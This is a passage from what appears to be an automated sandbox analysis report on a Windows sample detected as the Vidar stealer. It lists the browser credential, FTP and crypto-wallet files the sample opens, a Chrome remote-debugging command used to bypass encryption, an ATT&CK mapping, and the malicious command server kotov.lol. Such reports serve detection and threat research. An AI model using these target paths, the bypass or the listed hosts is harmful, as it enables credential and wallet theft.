Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: keystore
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Create Account	1 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Credentials in Registry	1 Query Registry	Remote Desktop Protocol	4 Data from Local System	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	1 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Account Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	33 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	54%	ReversingLabs	Win32.Trojan.InjectorX
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://kotov.lolFHJJJJEC	0%	Avira URL Cloud	safe
https://kotov.lol/)	100%	Avira URL Cloud	malware
https://kotov.lol0d52d366a329a6	0%	Avira URL Cloud	safe
https://kotov.loltosh;	0%	Avira URL Cloud	safe
https://kotov.lolipart/form-data;	0%	Avira URL Cloud	safe
https://kotov.lol/	100%	Avira URL Cloud	malware
https://kotov.lol/Z	100%	Avira URL Cloud	malware
https://kotov.lol/p	100%	Avira URL Cloud	malware
https://kotov.lolDGCBFIIJ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.165.220.66	true	false	high
www.google.com	142.250.181.68	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
kotov.lol	95.217.25.228	true	true	unknown
googlehosted.l.googleusercontent.com	142.250.181.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879692299&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://sb.scorecardresearch.com/b2?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://c.msn.com/c.gif?rnd=1732879686233&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=ecdf21827ba149bbbcdd7ab6ae707f63&activityId=ecdf21827ba149bbbcdd7ab6ae707f63&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1956C2ECABBF4BD89972CE41F155F45C&MUID=0D52E8701DB86AF23F08FD361CDF6BCA	false		high
https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx	false		high
https://kotov.lol/	true	Avira URL Cloud: malware	unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732879693298&w=0&anoncknm=app_anon&NoResponseBody=true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	false		high
https://c.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://ntp.msn.com/0	000003.log10.10.dr	false		high
https://ntp.msn.com/_default	QuotaManager.10.dr	false		high
https://www.last.fm/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.lol/)	file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://deff.nelreports.net/api/report?cat=msn	Reporting and NEL.11.dr	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.10.dr	false		high
https://sb.scorecardresearch.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://steamcommunity.com/profiles/76561199803837316g88paMozilla/5.0	file.exe	false		high
https://docs.google.com/	manifest.json.10.dr	false		high
https://www.youtube.com	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.instagram.com	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://web.skype.com/?browsername=edge_canary_shoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://drive.google.com/	manifest.json.10.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.lolFHJJJJEC	file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.messenger.com	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.loltosh;	file.exe, 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/gv4dlpW	file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://unitedstates4.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://i.y.qq.com/n2/m/index.html	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.deezer.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://steamcommunity.com/profiles/76561199803837316	file.exe	false		high
https://web.telegram.org/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json.10.dr	false		high
https://drive-daily-4.corp.google.com/	manifest.json.10.dr	false		high
https://vibe.naver.com/today	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://srtb.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://unitedstates1.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	false		high
https://t.me/gv4dlp2d1	file.exe, 00000000.00000002.2643455185.00000000007DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.msn.com	1926aa11-c77c-465f-b97d-a31092fa34d6.tmp.11.dr	false		high
https://kotov.lolipart/form-data;	file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.	file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json.10.dr	false		high
https://excel.new?from=EdgeM365Shoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-daily-5.corp.google.com/	manifest.json.10.dr	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	Reporting and NEL.11.dr	false		high
https://www.google.com/chrome	content.js.10.dr, content_new.js.10.dr	false		high
https://www.tiktok.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.msn.com/web-notification-icon-light.png	2cc80dabc69f58b6_1.10.dr	false		high
https://chromewebstore.google.com/	manifest.json0.10.dr	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.2645583366.000000000372F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2647094626.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, BGHJEB.0.dr	false		high
https://kotov.lolDGCBFIIJ	file.exe, 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-preprod.corp.google.com/	manifest.json.10.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.10.dr	false		high
https://msn.comXIDv10	Cookies.11.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://chrome.google.com/webstore/	manifest.json0.10.dr	false		high
https://y.music.163.com/m/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://unitedstates2.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://bard.google.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.10.dr	false		high
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://t.me/	file.exe, 00000000.00000002.2643455185.0000000000816000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.whatsapp.com	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.lol0d52d366a329a6	file.exe, 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	file.exe, 00000000.00000003.1418724395.000000000085E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2643455185.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false		high
https://m.kugou.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://www.office.com	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://outlook.live.com/mail/0/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://ntp.msn.com/edge/ntp	000003.log10.10.dr, 2cc80dabc69f58b6_1.10.dr	false		high
https://assets.msn.com/resolver/	2cc80dabc69f58b6_1.10.dr	false		high
https://powerpoint.new?from=EdgeM365Shoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi	BGHJEB.0.dr	false		high
https://tidal.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://ntp.msn.com	000003.log5.10.dr, 2cc80dabc69f58b6_0.10.dr	false		high
https://browser.events.data.msn.cn/	2cc80dabc69f58b6_1.10.dr	false		high
https://gaana.com/	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://drive-staging.corp.google.com/	manifest.json.10.dr	false		high
https://outlook.live.com/mail/compose?isExtension=true	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://kotov.lol/p	file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2647094626.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2645583366.000000000376C000.00000004.00000020.00020000.00000000.sdmp, IJJKKJ.0.dr, Web Data.10.dr, GCFCFC.0.dr	false		high
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000002.2650845169.000000000400D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ntp.msn.com/	000003.log10.10.dr, 000003.log0.10.dr	false		high
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start	Session_13377353273505919.10.dr	false		high
https://latest.web.skype.com/?browsername=edge_canary_shoreline	ed509262-a3d7-48d4-9895-b65f9722330f.tmp.10.dr	false		high
